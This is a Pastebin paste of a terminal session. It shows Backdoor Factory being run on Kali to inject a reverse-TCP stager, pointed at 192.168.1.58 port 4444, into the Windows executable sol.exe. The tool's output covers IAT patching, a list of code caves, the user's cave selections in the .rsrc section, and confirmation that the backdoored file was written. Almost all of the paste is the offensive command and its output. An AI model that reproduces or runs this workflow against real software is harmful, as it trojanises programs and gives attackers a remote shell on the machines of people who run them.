API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 27th, 2015
241
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.00 KB | None | 0 0
raw download clone embed print report
  1. ./backdoor.py -f /root/Desktop/sol.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.58 -P 4444 -J
  2. -.(`-') (`-') _ <-.(`-') _(`-') (`-')
  3. __( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
  4. '-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
  5. | .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
  6. | '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
  7. | /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
  8. | '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
  9. `------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
  10. (`-') _ (`-') (`-')
  11. <-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
  12. (`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
  13. (OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
  14. / | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
  15. \_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
  16. `| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
  17. `--' `--' `--' `-----' `--' `-----' `--' '--' `--'
  18.  
  19. Author: Joshua Pitts
  20. Email: the.midnite.runr[-at ]gmail<d o-t>com
  21. Twitter: @midnite_runr
  22. IRC: freenode.net #BDFactory
  23.  
  24. Version: 3.0.1
  25.  
  26. [*] In the backdoor module
  27. [*] Checking if binary is supported
  28. [*] Gathering file info
  29. [*] Reading win32 entry instructions
  30. [*] Loading PE in pefile
  31. [*] Parsing data directories
  32. [*] Adding New Section for updated Import Table
  33. [!] Adding CreateThread Thunk in new IAT
  34. [!] Adding VirtualAlloc Thunk in new IAT
  35. [*] Gathering file info
  36. [*] Checking updated IAT for thunks
  37. [*] Loading PE in pefile
  38. [*] Parsing data directories
  39. [*] Looking for and setting selected shellcode
  40. [*] Creating win32 resume execution stub
  41. [*] Looking for caves that will fit the minimum shellcode length of 43
  42. [*] All caves lengths: 71, 298, 43
  43. ############################################################
  44. The following caves can be used to inject code and possibly
  45. continue execution.
  46. **Don't like what you see? Use jump, single, append, or ignore.**
  47. ############################################################
  48. [*] Cave 1 length as int: 71
  49. [*] Available caves:
  50. 1. Section Name: None; Section Begin: None End: None; Cave begin: 0x328 End: 0x3fc; Cave Size: 212
  51. 2. Section Name: .text; Section Begin: 0x400 End: 0x6200; Cave begin: 0x6130 End: 0x61fc; Cave Size: 204
  52. 3. Section Name: None; Section Begin: None End: None; Cave begin: 0x6349 End: 0x640a; Cave Size: 193
  53. 4. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x973b End: 0x998c; Cave Size: 593
  54. 6. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9b6c End: 0x9bc8; Cave Size: 92
  55. 7. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9c40 End: 0x9c88; Cave Size: 72
  56. 52. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbe1f End: 0xbef4; Cave Size: 213
  57. 58. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xd01b End: 0xd09c; Cave Size: 129
  58. 59. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xdc63 End: 0xddfc; Cave Size: 409
  59. **************************************************
  60. [!] Enter your selection: 4
  61. [!] Using selection: 4
  62. [*] Changing flags for section: .rsrc
  63. [*] Cave 2 length as int: 298
  64. [*] Available caves:
  65. 4. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x973b End: 0x998c; Cave Size: 593
  66. 59. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xdc63 End: 0xddfc; Cave Size: 409
  67. **************************************************
  68. [!] Enter your selection: 4
  69. [!] Using selection: 4
  70. [*] Changing flags for section: .rsrc
  71. [*] Cave 3 length as int: 43
  72. [*] Available caves:
  73. 1. Section Name: None; Section Begin: None End: None; Cave begin: 0x328 End: 0x3fc; Cave Size: 212
  74. 2. Section Name: .text; Section Begin: 0x400 End: 0x6200; Cave begin: 0x6130 End: 0x61fc; Cave Size: 204
  75. 3. Section Name: None; Section Begin: None End: None; Cave begin: 0x6349 End: 0x640a; Cave Size: 193
  76. 4. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x973b End: 0x998c; Cave Size: 593
  77. 6. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9b6c End: 0x9bc8; Cave Size: 92
  78. 7. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0x9c40 End: 0x9c88; Cave Size: 72
  79. 38. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb3a3 End: 0xb3d0; Cave Size: 45
  80. 39. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb463 End: 0xb494; Cave Size: 49
  81. 40. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb524 End: 0xb554; Cave Size: 48
  82. 41. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb5df End: 0xb614; Cave Size: 53
  83. 42. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb69f End: 0xb6d3; Cave Size: 52
  84. 43. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb75f End: 0xb790; Cave Size: 49
  85. 44. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb81f End: 0xb850; Cave Size: 49
  86. 45. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb8df End: 0xb913; Cave Size: 52
  87. 46. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xb99f End: 0xb9d4; Cave Size: 53
  88. 47. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xba5f End: 0xba90; Cave Size: 49
  89. 48. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbb1f End: 0xbb4c; Cave Size: 45
  90. 49. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbbdf End: 0xbc0c; Cave Size: 45
  91. 50. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbc9f End: 0xbccc; Cave Size: 45
  92. 51. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbd5f End: 0xbd8c; Cave Size: 45
  93. 52. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xbe1f End: 0xbef4; Cave Size: 213
  94. 53. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xc08b End: 0xc0bb; Cave Size: 48
  95. 54. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xc108 End: 0xc134; Cave Size: 44
  96. 58. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xd01b End: 0xd09c; Cave Size: 129
  97. 59. Section Name: .rsrc; Section Begin: 0x6400 End: 0xde00; Cave begin: 0xdc63 End: 0xddfc; Cave Size: 409
  98. **************************************************
  99. [!] Enter your selection: 4
  100. [!] Using selection: 4
  101. [*] Changing flags for section: .rsrc
  102. [*] Patching initial entry instructions
  103. [*] Creating win32 resume execution stub
  104. [*] Looking for and setting selected shellcode
  105. File sol.exe is in the 'backdoored' directory
  106. root@kali:~/Veil-Evasion/tools/backdoor#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!